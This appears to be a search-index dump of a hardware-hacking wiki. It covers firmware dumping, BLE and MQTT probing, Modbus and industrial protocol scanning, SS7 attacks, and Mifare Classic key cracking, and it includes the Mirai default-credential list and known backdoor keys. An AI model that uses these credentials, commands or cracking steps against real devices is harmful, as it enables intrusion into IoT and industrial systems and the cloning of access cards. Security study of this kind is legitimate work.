init\nreset init\nhalt\ndump_image image.bin 0x00000000 0x00040000\nexit\n
$ sudo openocd  -f /home/maki/tools/hardware/openocd/tcl/interface/stlink-v2-1.cfg -f /home/maki/tools/hardware/openocd/tcl/target/nrf51.cfg -f dump_fw.cfg\n
"},{"location":"gadgets/micro-bit/#python-code","title":"Python code","text":"

Content of image.dd file:

$ strings image.bin\n[...]\nmain.py# Add your Python code here. E.g.\nfrom microbit import *\nwhile True:\n    display.scroll('Hello, World!')\n    displa\ny.show(Image.HEART)\n    sleep(1000)\n    print(\"coucou\")\n    sleep(2000)\n
"},{"location":"gadgets/proxmark/","title":"Proxmark","text":""},{"location":"gadgets/proxmark/#_1","title":"Proxmark","text":"

TODO

"},{"location":"gadgets/proxmark/#references","title":"References","text":""},{"location":"gadgets/pwnagotchi/","title":"Pwnagotchi","text":"

Documentation: https://pwnagotchi.ai/

"},{"location":"gadgets/raspberry-pi/","title":"Raspberry Pi","text":""},{"location":"gadgets/raspberry-pi/#gpio-header","title":"GPIO Header","text":""},{"location":"gadgets/raspberry-pi/#tools","title":"Tools","text":""},{"location":"gadgets/raspberry-pi/#references","title":"References","text":""},{"location":"other/default-iot-passwords/","title":"Default IoT Passwords","text":"

IoT Device Default Password Lookup : https://www.defpass.com

"},{"location":"other/default-iot-passwords/#mirai-wordlist","title":"Mirai Wordlist","text":"

Seclist Mirai Wordlist : https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Malware/mirai-botnet.txt

root xc3511\nroot vizxv\nroot admin\nadmin admin\nroot 888888\nroot xmhdipc\nroot default\nroot jauntech\nroot 123456\nroot 54321\nsupport support\nroot (none)\nadmin password\nroot root\nroot 12345\nuser user\nadmin (none)\nroot pass\nadmin admin1234\nroot 1111\nadmin smcadmin\nadmin 1111\nroot 666666\nroot password\nroot 1234\nroot klv123\nAdministrator admin\nservice service\nsupervisor supervisor\nguest guest\nguest 12345\nadmin1 password\nadministrator 1234\n666666 666666\n888888 888888\nubnt ubnt\nroot klv1234\nroot Zte521\nroot hi3518\nroot jvbzd\nroot anko\nroot zlxx.\nroot 7ujMko0vizxv\nroot 7ujMko0admin\nroot system\nroot ikwb\nroot dreambox\nroot user\nroot realtek\nroot 000000\nadmin 1111111\nadmin 1234\nadmin 12345\nadmin 54321\nadmin 123456\nadmin 7ujMko0admin\nadmin pass\nadmin meinsm\ntech tech\nmother fucker\n
"},{"location":"other/electronic-components/","title":"Electronic Components","text":""},{"location":"other/electronic-components/#resistors","title":"Resistors","text":""},{"location":"other/electronic-components/#capacitors","title":"Capacitors","text":""},{"location":"other/electronic-components/#transistors","title":"Transistors","text":""},{"location":"other/electronic-components/#inductors","title":"Inductors","text":""},{"location":"other/electronic-components/#integrated-circuit-ic-microchip","title":"Integrated Circuit (IC) microchip","text":""},{"location":"other/electronic-components/#microcontroller-unit-mcu","title":"Microcontroller Unit (MCU)","text":""},{"location":"other/electronic-components/#system-on-chip-soc","title":"System-on-Chip (SoC)","text":""},{"location":"other/electronic-components/#trusted-platform-module-tpm","title":"Trusted Platform Module (TPM)","text":""},{"location":"other/links-and-hardware-kits/","title":"Links & Hardware Kits","text":""},{"location":"other/links-and-hardware-kits/#hardware-challenges-ctf","title":"Hardware Challenges & CTF","text":""},{"location":"other/links-and-hardware-kits/#twitch-streaming","title":"Twitch & Streaming","text":""},{"location":"other/links-and-hardware-kits/#books","title":"Books","text":""},{"location":"other/links-and-hardware-kits/#hardware-kits","title":"Hardware Kits","text":""},{"location":"protocols/bluetooth/","title":"Bluetooth","text":""},{"location":"protocols/bluetooth/#tools","title":"Tools","text":""},{"location":"protocols/bluetooth/#bluetooth-configuration","title":"Bluetooth configuration","text":"

Requirements and configuration for Kali Linux.

$ sudo apt-get install bluetooth blueman bluez\n$ sudo systemctl start bluetooth\n$ sudo hciconfig hci0 up\n

Enumerate Bluetooth devices

$ sudo hcitool lescan\n00:1A:7D:DA:71:06 Ph0wn Beacon\n25:55:84:20:73:70 (unknown)\n

[!CAUTION] apt doesn't ship a recent version of bluez; build it from source with the following commands.

wget https://www.kernel.org/pub/linux/bluetooth/bluez-5.18.tar.xz\ndpkg --get-selections | grep -v deinstall | grep bluez\ntar xvf bluez-5.18.tar.xz\nsudo apt-get install libglib2.0-dev libdbus-1-dev libusb-dev libudev-dev libical-dev systemd libreadline-dev\ncd bluez-5.18\n./configure --enable-library\nmake -j8 && sudo make install\nsudo cp attrib/gatttool /usr/local/bin/\n
"},{"location":"protocols/bluetooth/#ble-enumerate-services-and-characteristics","title":"BLE - Enumerate services and characteristics","text":"

BLE data exchange is based on a specification called the Generic Attribute Profile (GATT), which defines how data is transferred between a client and a server.

Using bluez/gatttool, we can enumerate the services and their characteristics; use sudo gatttool -b $MAC -I to get an interactive gatttool shell:

MAC=30:AE:A4:2A:54:8A\n\n$ gatttool -b $MAC --primary\nattr handle = 0x0001, end grp handle = 0x0005 uuid: 00001801-0000-1000-8000-00805f9b34fb\nattr handle = 0x0014, end grp handle = 0x001c uuid: 00001800-0000-1000-8000-00805f9b34fb\nattr handle = 0x0028, end grp handle = 0xffff uuid: 000000ff-0000-1000-8000-00805f9b34fb\n# Services whose UUID start with 00001801 and 00001800 are special values defined in the norm\n# The other is a custom one which holds the CTF\n\n$ gatttool -b $MAC --characteristics\nhandle = 0x0002, char properties = 0x20, char value handle = 0x0003, uuid = 00002a05-0000-1000-8000-00805f9b34fb\nhandle = 0x0015, char properties = 0x02, char value handle = 0x0016, uuid = 00002a00-0000-1000-8000-00805f9b34fb\n
"},{"location":"protocols/bluetooth/#ble-read-data","title":"BLE - Read data","text":"

Read data with gatttool

$ sudo gatttool -b $MAC -I\n[00:1A:7D:DA:71:06][LE]> connect\n

One liner to read a characteristic

$ gatttool -b $MAC --char-read -a 0x002a|awk -F':' '{print $2}'|tr -d ' '|xxd -r -p;printf '\\n'\n
"},{"location":"protocols/bluetooth/#ble-read-notificationindication","title":"BLE - Read notification/indication","text":"
$ gatttool -b $MAC -a 0x0040 --char-write-req --value=0100 --listen\n$ gatttool -b $MAC -a 0x0044 --char-write-req --value=0200 --listen\n
"},{"location":"protocols/bluetooth/#ble-write-data","title":"BLE - Write data","text":""},{"location":"protocols/bluetooth/#bluetooth-mac","title":"Bluetooth MAC","text":"

Change the Bluetooth MAC address

$ bdaddr -r 11:22:33:44:55:66\n$ gatttool -I -b E8:77:6D:8B:09:96 -t random\n
"},{"location":"protocols/bluetooth/#sniff-bluetooth-communication","title":"Sniff Bluetooth communication","text":""},{"location":"protocols/bluetooth/#using-ubertooth","title":"Using Ubertooth","text":"

You need three Ubertooth devices, one per BLE advertising channel (37, 38 and 39).

ubertooth-btle -U 0 -A 37 -f  -c bulb_37.pcap\nubertooth-btle -U 1 -A 38 -f  -c bulb_38.pcap\nubertooth-btle -U 2 -A 39 -f  -c bulb_39.pcap\n
"},{"location":"protocols/bluetooth/#using-microbit","title":"Using Micro::Bit","text":""},{"location":"protocols/bluetooth/#using-android-hci","title":"Using Android HCI","text":"

Enable the Bluetooth HCI log on the device via Developer Options.

It works like a hook in the stack to capture all the HCI packets in a file. For most Android devices, the log file is at /sdcard/btsnoop_hci.log or /sdcard/oem_log/btsnoop/

$ adb devices\n$ adb pull /sdcard/oem_log/btsnoop/<your log file>.log\n$ adb pull /sdcard/btsnoop_hci.log\n$ adb bugreport filename\n
"},{"location":"protocols/bluetooth/#challenges","title":"Challenges","text":""},{"location":"protocols/bluetooth/#references","title":"References","text":""},{"location":"protocols/can/","title":"CAN Bus","text":"

The Controller Area Network (CAN) bus is a high-integrity serial communication protocol designed for real-time data exchange in embedded systems, particularly in automotive and industrial applications. It operates on a multi-master, message-oriented architecture, allowing multiple devices (nodes) to communicate on the same network without a central controller.

"},{"location":"protocols/can/#interact","title":"Interact","text":"
pip install python-can\npip install python-can-utils\n
import can\n\n# Interface and channel are assumed here (socketcan on vcan0); adjust to your setup\nbus = can.Bus(interface='socketcan', channel='vcan0')\nwhile True:\n    # arbitration_id must be passed by keyword: the first positional parameter of can.Message is timestamp\n    msg = can.Message(arbitration_id=3, data=[0] * 8, is_extended_id=False)\n    bus.send(msg)\n
"},{"location":"protocols/can/#uds","title":"UDS","text":"

Unified Diagnostic Services (UDS) is a communication protocol used in automotive Electronic Control Units (ECUs) to enable diagnostics, firmware updates, routine testing and more.

"},{"location":"protocols/can/#implementation","title":"Implementation","text":""},{"location":"protocols/can/#sid","title":"SID","text":"UDS SID (Request) UDS SID (Response) UDS Service Details 0x10 0x50 Diagnostic session control Control which UDS services are available. 0x11 0x51 ECU Reset It resets the ECU (includes hard reset, key off and soft reset) 0x27 0x67 Security access It enables use of security critical services via authentication. 0x28 0x68 Communication control This field turns send/receive of messages ON or OFF in the ECU. 0x29 0x69 Aunthentication Enables more advanced authentication vs. 0x27 (PKI based exchange). 0x3E 0x7E Tester present Send a heartbeat message periodically to remain in existing session . 0x83 0xC3 Access timing parameters View/Modify timing parameters used in client/server communication. 0x84 0xC4 Secured Data Transmission Send encrypted data via ISO 15764 (extended data link security) 0x85 0xC5 Control DTC Settings Enable/Disable detection of errors (e.g. used during diagnostics) 0x86 0xC6 Response On Event Request that ECU processes a service request if an event happens 0x87 0xC7 Link Control Set the baud rate for diagnostic access 0x22 0x62 Read Data by Identifier Read data from targetted ECU - e.g. VIN, sensor data etc. 0x23 0x63 Read Data by Address Read data from physical memory (e.g. 
to understand software behaviour) 0x24 0x64 Read Scaling Data By Identifier Read information about how to scale data identifiers 0x2A 0x6A Read Data by Identifier Periodic Request ECU to broadcast sensor data at slow/medium/fast/stop rate 0x2C 0x6C Dynamically Define Data Identifier Define data parameter for use in 0x22 or 0x2A dynamically 0x2E 0x6E Write Data By Identifier Program specific variables determined by data parameters 0x3D 0x7D Write Memory By address Write information to the ECU's memory 0x14 0x54 Clear Diagnostic Information Delete stored DTCs 0x19 0x59 Read DTC Information Read stored DTCs as well as related information 0x2F 0x6F Input Output Control By Identifier Gain control over ECU analog/digital inputs/outputs 0x31 0x71 Routine Control Initiate/stop routines (e.g. self testing, erasing of flash memory) 0x34 0x74 Request Download Start request to add software/data to ECU (including location/size) 0x35 0x75 Request Upload Start request to read software/data from ECU (including location/size) 0x36 0x76 Transfer Data Perform actual transfer of data following use of 0x74/0x75 0x37 0x77 Request Transfer Exit Stop the transfer of data 0x38 0x78 Request File Transfer Perform a file download/upload to/from the ECU 0x7F Negative Response Send with a negative response code when a request can not be handled."},{"location":"protocols/can/#references","title":"References","text":""},{"location":"protocols/dnp3/","title":"DNP3","text":""},{"location":"protocols/dnp3/#discovery","title":"Discovery","text":"

DNP3 Clients

DNP3 Nmap Script

Source: dnp3-enumerate.nse

nmap -sT --script dnp3-enumerate.nse -p 20000 <target_ip>\n
"},{"location":"protocols/dnp3/#traffic-generation","title":"Traffic Generation","text":""},{"location":"protocols/gps/","title":"GPS","text":"

TODO

"},{"location":"protocols/http/","title":"HTTP","text":""},{"location":"protocols/i2c/","title":"I2C","text":"

I2C (Inter-Integrated Circuit), pronounced \"I-squared-C\" or \"I-two-C\", is a popular communication protocol mainly used for low-speed, short-distance communication in embedded systems.

"},{"location":"protocols/i2c/#analysis","title":"Analysis","text":"

Enable I2C on the Raspberry Pi via raspi-config

"},{"location":"protocols/i2c/#read-write","title":"Read / Write","text":""},{"location":"protocols/i2c/#references","title":"References","text":""},{"location":"protocols/lora/","title":"LoRa","text":""},{"location":"protocols/lora/#lora-with-arduino-on-8681mhz","title":"LoRa with Arduino on 868.1MHZ","text":"

arduino-LoRa: use 868.1 MHz with spreading factor 10

#include <SPI.h>\n#include <LoRa.h>\n\nvoid onReceive(int packetSize);\n\nvoid setup() {\n  Serial.begin(9600);\n  while (!Serial);\n\n  Serial.println(\"LoRa Receiver\");\n\n  if (!LoRa.begin(868.1E6)) {\n    Serial.println(\"Starting LoRa failed!\");\n    while (1);\n  }\n  LoRa.setSpreadingFactor(10);\n\n  // register the callback first, then put the radio in continuous receive mode\n  LoRa.onReceive(onReceive);\n  LoRa.receive();\n}\n\nvoid onReceive(int packetSize) {\n  Serial.print(\"packet recv\\n\");\n  // read packet\n  for (int i = 0; i < packetSize; i++) {\n    Serial.print((char)LoRa.read());\n  }\n}\n\nvoid loop() {\n  // nothing to do: packets are delivered through the onReceive callback\n}\n
"},{"location":"protocols/lora/#bruteforce-all-the-eu-frequencies-and-the-spreadfactor","title":"Bruteforce all the EU frequencies and the SpreadFactor","text":"
#include <SPI.h>\n#include <LoRa.h>\n\n// EU868 channels to sweep (6 entries: the array size must match the initializer)\nfloat freq[6] = { 868.3E6, 868.5E6, 867.1E6, 867.5E6, 867.7E6, 867.9E6 };\nfloat currentFreq = 868.1E6;\nint currentSf = 10;\n\nvoid onReceive(int packetSize);\n\nvoid setup() {\n  Serial.begin(9600);\n  while (!Serial);\n\n  Serial.println(\"LoRa Receiver\");\n\n  if (!LoRa.begin(868.1E6)) {\n    Serial.println(\"Starting LoRa failed!\");\n    while (1);\n  }\n  LoRa.setSpreadingFactor(currentSf);\n  LoRa.onReceive(onReceive);\n  LoRa.receive();\n}\n\nvoid onReceive(int packetSize) {\n  // report which frequency / spreading factor the packet was heard on\n  Serial.print(\"packet recv on \");\n  Serial.print(currentFreq);\n  Serial.print(\" Hz, SF\");\n  Serial.println(currentSf);\n  // read packet\n  for (int i = 0; i < packetSize; i++) {\n    Serial.print((char)LoRa.read());\n  }\n}\n\nvoid loop() {\n  // sweep every frequency, and every spreading factor (7..12) for each frequency\n  for (int i = 0; i < 6; i++) {\n    currentFreq = freq[i];\n    LoRa.setFrequency(currentFreq);\n    for (int j = 7; j <= 12; j++) {\n      currentSf = j;\n      LoRa.setSpreadingFactor(currentSf);\n      LoRa.receive();\n      delay(5000);\n    }\n  }\n}\n
"},{"location":"protocols/lora/#display-rssi-of-the-packet","title":"Display RSSI of the packet","text":"

The Received Signal Strength Indication (RSSI) is the received signal power, expressed in dBm (decibels relative to one milliwatt).

The RSSI is a negative value: the closer to 0, the better the signal.

Typical LoRa RSSI values are:

#include <SPI.h>\n#include <LoRa.h>\n\nvoid onReceive(int packetSize);\n\nvoid setup() {\n  Serial.begin(9600);\n  while (!Serial);\n\n  Serial.println(\"LoRa Receiver\");\n\n  if (!LoRa.begin(867.1E6)) {\n    Serial.println(\"Starting LoRa failed!\");\n    while (1);\n  }\n  LoRa.setSpreadingFactor(8);\n  LoRa.onReceive(onReceive);\n  LoRa.receive();\n}\n\nvoid onReceive(int packetSize) {\n  Serial.print(\"packet recv\\n\");\n  // RSSI of the packet just received, in dBm\n  int rssi = LoRa.packetRssi();\n  Serial.println(rssi);\n  // drain the packet so the FIFO is ready for the next one\n  while (LoRa.available()) {\n    LoRa.read();\n  }\n}\n\nvoid loop() {\n  delay(1000);\n}\n
"},{"location":"protocols/mms/","title":"MMS (IEC 61850)","text":""},{"location":"protocols/mms/#discovery","title":"Discovery","text":"

MMS Client

MMS Discovery Nmap Script

Source: mms-identify.nse

nmap -d --script mms-identify.nse --script-args='mms-identify.timeout=500' -p 102 <target_host>\n
"},{"location":"protocols/mms/#explore-mms","title":"Explore MMS","text":""},{"location":"protocols/mms/#fuzzing-mms","title":"Fuzzing MMS","text":""},{"location":"protocols/modbus/","title":"Modbus","text":""},{"location":"protocols/modbus/#discovery","title":"Discovery","text":"

Modbus Client:

Modbus Discover Nmap Script:

nmap --script modbus-discover.nse --script-args='modbus-discover.aggressive=true' -p 502 <host>\n

Connect to Modbus Slave:

from pymodbus.client import ModbusTcpClient\n\nclient = ModbusTcpClient('<IP_Address_of_Target>')\nclient.connect()  # open the TCP connection before issuing requests\nclient.write_coil(1, True)\nresult = client.read_coils(1, count=1)\nif result.isError():\n    print(result)\nelse:\n    print(result.bits[0])\nclient.close()\n

Modbus Pentesting:

Modbus Slave Simulator

Modbus Master Simulator

"},{"location":"protocols/mqtt/","title":"MQTT","text":""},{"location":"protocols/mqtt/#discovery","title":"Discovery","text":"

MQTT client:

Scan an MQTT broker with nmap: nmap -p 1883 -vvv --script=mqtt-subscribe -d sensors.domain.com

mosquitto_sub -h sensors.domain.com -t '#'\nmosquitto_sub -h sensors.domain.com -t '+'\nmosquitto_sub -h sensors.domain.com -t \"/sensor/\"\n
"},{"location":"protocols/mqtt/#explore-mqtt","title":"Explore MQTT","text":"

Connect and subscribe to every topic using the # wildcard.

import paho.mqtt.client as mqtt\n\ndef on_connect(client, userdata, flags, rc):\n    print(\"[+] Connection successful\")\n    client.subscribe('#', qos=1)       # Subscribe to all topics\n    client.subscribe('$SYS/#')         # Broker Status (Mosquitto)\n\ndef on_message(client, userdata, msg):\n    print('[+] Topic: %s - Message: %s' % (msg.topic, msg.payload))\n\nclient = mqtt.Client(client_id=\"MqttClient\")  # paho-mqtt 1.x callback API\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.connect('SERVER IP HERE', 1883, 60)\nclient.loop_forever()\n

Send MQTT requests

import paho.mqtt.client as mqtt\n\ndef on_connect(client, userdata, flags, rc):\n    print(\"[+] Connection success\")\n\nclient = mqtt.Client(client_id=\"MqttClient\")  # paho-mqtt 1.x callback API\nclient.on_connect = on_connect\nclient.connect('IP SERVER HERE', 1883, 60)\nclient.loop_start()  # run the network loop so the connection completes and the message is sent\ninfo = client.publish('smarthouse/garage/door', \"{'open':'true'}\")\ninfo.wait_for_publish()\nclient.loop_stop()\nclient.disconnect()\n
"},{"location":"protocols/mqtt/#mqtt-fuzzing","title":"MQTT Fuzzing","text":""},{"location":"protocols/ntag215-amiibo/","title":"NFC - Amiibo","text":"

Amiibo are small figurines or cards produced by Nintendo that contain Near Field Communication (NFC) chips. These chips allow the Amiibo to interact with various Nintendo gaming systems, such as the Wii U, Nintendo 3DS, and Nintendo Switch.

"},{"location":"protocols/ntag215-amiibo/#tools","title":"Tools","text":""},{"location":"protocols/ntag215-amiibo/#amiibo-encryption","title":"Amiibo Encryption","text":"

Nintendo added their own layer of encryption and digital signing to increase security. The digital signing prevents you from blindly altering the game data bytes because then the signature will no longer match. Additionally, the signature is also based on the UID of the tag, so you can't simply copy the bytes from an Amiibo to a blank NTAG215 to clone it.

"},{"location":"protocols/ntag215-amiibo/#password-reverse-engineering","title":"Password Reverse Engineering","text":"

The password is derived from the 7-byte tag UID (Unique Identifier) of the Amiibo. The algorithm used to generate the password is as follows:

password[0] = 0xAA ^ (uid[1] ^ uid[3])\npassword[1] = 0x55 ^ (uid[2] ^ uid[4])\npassword[2] = 0xAA ^ (uid[3] ^ uid[5])\npassword[3] = 0x55 ^ (uid[4] ^ uid[6])\n

The algorithm takes specific bytes of the UID, performs XOR operations with constant values (0xAA and 0x55), and combines them to form the 32-bit password.

"},{"location":"protocols/ntag215-amiibo/#references","title":"References","text":""},{"location":"protocols/signaling-system-7/","title":"SS7 - Signaling System No. 7","text":""},{"location":"protocols/signaling-system-7/#tools","title":"Tools","text":""},{"location":"protocols/signaling-system-7/#sms-2fa-interception","title":"SMS 2FA Interception","text":"

SS7 plays a part in the transport of SMS messages. An attacker may be able to register a victim's MSISDN (mobile number) on a fake MSC (Mobile Switching Centre); the victim's operator's HLR (Home Location Register), which works as a kind of telephone directory for MSISDNs, operators and SMS service centres (SMSC), will then set the new location for the victim's MSISDN.

When, in this example, the victim's bank sends them a 2FA authentication token, the MSC transfers the SMS to the SMSC. The real SMSC asks the victim's operator's HLR for the victim's location, and the HLR replies with the attacker-operated MSC. The real operator's SMSC then transfers the SMS to the fake MSC operated by the attacker.

"},{"location":"protocols/signaling-system-7/#sms-spoofing","title":"SMS Spoofing","text":"

One of the simplest and most accessible attacks is SMS spoofing, which doesn't require direct access to the SS7 network. Many people are unaware that the \"from\" field in an SMS message lacks authentication, allowing it to be easily forged. The sender can insert any alphanumeric word into the \"from\" section of a message.

SMS spoofing attacks can be carried out with minimal cost by using an SMS gateway service, many of which are accessible on the clear web. According to SOS Intelligence, most of these services lack abuse monitoring or prevention mechanisms. As a result, it\u2019s possible to send spoofed messages to a victim\u2014much like phishing emails\u2014prompting them to take action, often at little to no cost.

"},{"location":"protocols/signaling-system-7/#location-tracking","title":"Location Tracking","text":"

Within the SS7 network of a network operator it may be possible to request the LAC (Location Area Code) and Cell ID and, with that information, get a reasonably good location for a victim. However, this may require prior knowledge of the subscriber's IMEI (International Mobile Equipment Identity) and/or IMSI (International Mobile Subscriber Identity); an MSISDN alone may not be sufficient to query this information.

"},{"location":"protocols/signaling-system-7/#references","title":"References","text":""},{"location":"protocols/spi/","title":"SPI","text":"

Serial Peripheral Interface (SPI) is a synchronous communication protocol used primarily in microcontroller-based systems. The controller selects a chip and sends data to and receives data from it. NOR flash chips with an SPI interface are commonly used as firmware boot chips. SPI has one data line in each direction (one for reading, one for writing); in QSPI mode, four lines are used in parallel.

SPI mainly involves four lines or wires:

"},{"location":"protocols/spi/#interact-via-spi","title":"Interact via SPI","text":""},{"location":"protocols/spi/#dump-firmware-via-spi","title":"Dump Firmware via SPI","text":""},{"location":"protocols/spi/#dump-using-a-raspberry-pi","title":"Dump using a Raspberry Pi","text":"
sudo raspi-config > Interface > SPI(P4)\n# NOTE: might need to press/hold the reset button\n\n# check\nsudo flashrom -p linux_spi:dev=/dev/spidev0.0,spispeed=1000\n\n# dump\nsudo flashrom -p linux_spi:dev=/dev/spidev0.0,spispeed=1000 -r dump.bin\n

The ESP8266 and ESP32 have several SPI buses available in hardware. SPI0 is hooked up to the chip's own internal flash and is not intended for use, but the HSPI and VSPI buses can be used in combination with a SOIC-8 clamp to read from SPI NOR chips. Cheap clips have a tendency to jump off the chips; the Pomona 5250 has a better grip.

$ python ./esptool.py read_flash --spi-connection HSPI 0 0x400000 flash_dump.bin\n
"},{"location":"protocols/spi/#dump-with-hydrabus","title":"Dump with HydraBus","text":"
flashrom --programmer serprog:dev=/dev/ttyACM0,spispeed=2M -c \"MX25L12833F\" --progress -r /tmp/image.bin\n
"},{"location":"protocols/spi/#dump-with-buspirate","title":"Dump with BusPirate","text":"
flashrom -p buspirate_spi:dev=/dev/ttyUSB0\nflashrom -p buspirate_spi:dev=/dev/ttyUSB0 -c W25Q64.V\n\nflashrom -p buspirate_spi:dev=/dev/ttyUSB0 -c W25Q64.V -r firmware.bin\n
"},{"location":"protocols/spi/#spiffs","title":"SPIFFS","text":"
$ cd ~/.arduino15/packages/esp32/tools/esptool/2.3.1\n$ python ./esptool.py -p /dev/ttyUSB0 -b 460800 read_flash 0x300000 0x0fb000 /tmp/spiffs.bin\n\n$ cd ~/.arduino15/packages/esp32/tools/mkspiffs/0.2.3\n$ ./mkspiffs -u /tmp/data -p 256 -b 8192 -s 1028096 /tmp/spiffs.bin\n
"},{"location":"protocols/spi/#esp32-diagrams","title":"ESP32 Diagrams","text":"

Color coded which pins can be connected from the ESP HSPI pins to an SPI flash. The pink interfaces (DQ1 and DQ2) are optional, they are only used in QSPI mode.

"},{"location":"protocols/spi/#references","title":"References","text":""},{"location":"protocols/upnp/","title":"UPnP","text":"

TODO

"},{"location":"protocols/usb/","title":"USB","text":""},{"location":"protocols/usb/#usb-type-2","title":"USB Type 2","text":""},{"location":"protocols/usb/#usb-type-3","title":"USB Type 3","text":""},{"location":"protocols/usb/#usb-type-c","title":"USB Type C","text":""},{"location":"protocols/usb/#fuzzing","title":"Fuzzing","text":""},{"location":"protocols/usb/#references","title":"References","text":""},{"location":"protocols/zigbee/","title":"ZigBee","text":"

Zigbee is a specification for a suite of high-level communication protocols using low-power digital radios. It's designed for use in areas like home automation, medical data collection, industrial control systems, and other applications that require secure and reliable wireless communication.

Zigbee is an IEEE 802.15.4-based, wireless networking standard, which is basically used for two-way communication between sensors and control systems. Zigbee is a short-range wireless communication standard like Bluetooth and Wi-Fi while covering a range of 10 to 100 meters.

"},{"location":"protocols/zigbee/#tools","title":"Tools","text":""},{"location":"protocols/zigbee/#default-trust-center-link-key","title":"Default Trust Center Link Key","text":"

Zigbee includes several layers of security, including AES-128 encryption, to ensure that data is transmitted securely across the network.

The Zigbee Default Trust Center Link Key is a predefined cryptographic key used in Zigbee networks to secure the initial joining process of a new device to the network. It's part of the security measures implemented within the Zigbee protocol to ensure that only authorized devices can join a particular network.

When a new device wants to join a Zigbee network, it must first establish a secure connection with the Trust Center. To do this, the device and the Trust Center use the Default Trust Center Link Key to encrypt their communication.

For the profile \"Home Automation\" the default Trust Center Link Key is ZigBeeAlliance09 (\"5A:69:67:42:65:65:41:6C:6C:69:61:6E:63:65:30:39\").

You can use it in Wireshark: Edit > Preferences > Protocols > Zigbee NWK, then \"New\" and write the key in hex format.

Example: CVE-2020-28952 - Athom Homey Static and Well-known Keys

"},{"location":"protocols/zigbee/#references","title":"References","text":""},{"location":"protocols/rfid-nfc/hf-mifare-classic/","title":"HF - Mifare Classic","text":""},{"location":"protocols/rfid-nfc/hf-mifare-classic/#hf-mifare-classic-1k","title":"HF - Mifare Classic 1k","text":"

New method for Proxmark : hf mf autopwn

"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#dictionary-attack","title":"Dictionary attack","text":"

Common keys to try against the card when attempting a dictionary attack.

Key | Description\nFFFFFFFFFFFF | Default key\n000000000000 | Blank key\nA396EFA4E24F | FM11RF08S universal backdoor key\nA31667A8CEC1 | FM11RF08 older backdoor key

More keys and dictionaries can be found at the following links:

hf mf chk *1 ? t # Default keys\nhf mf chk *1 ? d default_keys.dic\nhf mf chk 0 A default_keys.dic # Dictionary attack with file: default_keys.dic\n
"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#darkside-attack-prng-weak","title":"Darkside attack (PRNG Weak)","text":"

Proxmark method

pm3> hf search\npm3> hf mfu\npm3> hf mf darkside  (fork command)\npm3> hf mf mifare    (original command)\nParity is all zero. Most likely this card sends NACK on every failed authentication. # Card is empty...\nor\nFound valid key:ffffffffffff # KEY_FOUND\n\npm3> hf mf chk 0 A KEY_FOUND    (Check Found Key On Block 0 A)\n

ACR122u method

# start cracking the first key of the first sector. \nmfcuk -C -R 0:A -v 3 -s 250 -S 250\nmfcuk -C -R 3:A -v 3 -s 250 -S 250 -o mycard.mfc\n
"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#nested-attack-prng-weak","title":"Nested attack (PRNG Weak)","text":"

Need to find a default key to extract the others

Proxmark method

hf search\nhf mf chk 1 ? t                      # \"Test Block Keys\" command which will test the default keys for us\nhf mf nested 1 0 A a0a1a2a3a4a5 t    # \"Nested Attack\" use the key a0a1a2a3a4a5, keeping the key in memory with \"t\"\nhf mf chk * ?                        # \"Test Block Keys\" command which will test the default keys for us\nhf mf nested 1 0 A ffffffffffff   d  # \"Nested Attack\" use the key ffffffffffff to extract the others (file:dumpkeys.bin)\nhf mf dump 1                         # Dump content\nhf mf restore 1                      # Restore content into the card\nhf mf wrbl 5 A 080808080808 32110000cdeeffff3211000005fa05fa  # write on block 5, with the key 0808... the content 3211...\nhf mf rdbl 5 A 080808080808          # Read block 5 with the key 0808..\n\n\npython pm3_mfd2eml.py dumpdata.bin dumpdata.eml\npm3> hf mf cload dumpdata\n

ACR122u method

nfc-list\nmfoc -O card.mfd # dump the memory of the tag\n# The P parameter sets the number of probes per sector. By default it is 20, but it can be raised to 500.\nmfoc -P 500 -O dump_first_try.dmp\nnfc-mfclassic w a key.mfd data.mfd # write data\nnfc-mfclassic W a key.mfd data.mfd # write data and sector 0\n
"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#hardnested-attack","title":"Hardnested attack","text":"

One key is needed in order to use this attack

For newest MIFARE Classic and MIFARE Plus SL1

Proxmark method

NOTE: These hardware changes resulted in the Proxmark 3 Easy being incapable of performing several of the Proxmark's advanced features, including the Mifare Hard-Nested attacks. In other words, you need a real Proxmark 3, not a cheap Chinese copy.

# find a default key\n# res column is either equal to 1 or 0. \n# A 1 in the column means the key was valid for that sector.\nhf mf chk *1 ? t\n\n\n# <block number> <key A|B> <key (12 hex symbols)>\n# <target block number> <target key A|B> [known target key (12 hex symbols)] [w] [s]\n# w: Acquire nonces and write them to binary file nonces.bin\nhf mf hardnested 0 A 8829da9daf76 4 A w\n\n# then https://github.com/aczid/crypto1_bs\n./solve_piwi 0xcafec0de.bin\n./solve_piwi_bs 0xcafec0de.bin\n

ACR122u method

With key A a0a1a2a3a4a5 known for sector 0, we want key A for sector 1. This method can be reused for every sector.

./libnfc_crypto1_crack a0a1a2a3a4a5 0 a 4 a\nFound tag with uid 62ef9e5a, collecting nonces for key A of block 4 (sector 1) using known key A a0a1a2a3a4a5 for block 0 (sector 0)\nCollected 2379 nonces... leftover complexity 23833993588 (~2^34.47) - initializing brute-force phase...\nStarting 4 threads to test 23833993588 states using 256-way bitslicing\nCracking...  88.93%\nFound key: c44e2b5e4ce3\nTested 21232975852 states\n
"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#magic-chinese-card-acronyms","title":"Magic Chinese Card - Acronyms","text":"

UID - The original Chinese Magic Backdoor card. These cards respond to the backdoor commands and will show Chinese magic backdoor commands (GEN 1a) detected when you do an hf search. These cards can be detected by probing the card to see if it responds to the backdoor commands. Some RFID systems may try to detect these cards.

CUID - The 2nd generation Chinese Magic Backdoor card. These cards do not use the backdoor commands, but instead allow Block 0 to be written to like any other block on the card. This gives the card better compatibility to be written to from an Android phone. However, some RFID systems can detect this type of card by sending a write command to Block 0, making the card invalid after the first use is attempted.

FUID - This type of card is not as common, but allows Block 0 to be written to just once. This allows you to create a clone of a card and any checks done by the RFID system will pass because Block 0 is no longer writable.

UFUID - This type of card is apparently a \"better\" version of the FUID card. Instead of only allowing Block 0 to be written once, you can write to it many times and then lock the block later when you're happy with the result. After locking Block 0, it cannot be unlocked to my knowledge. I do not think there is currently a way to lock these cards using the Proxmark3.

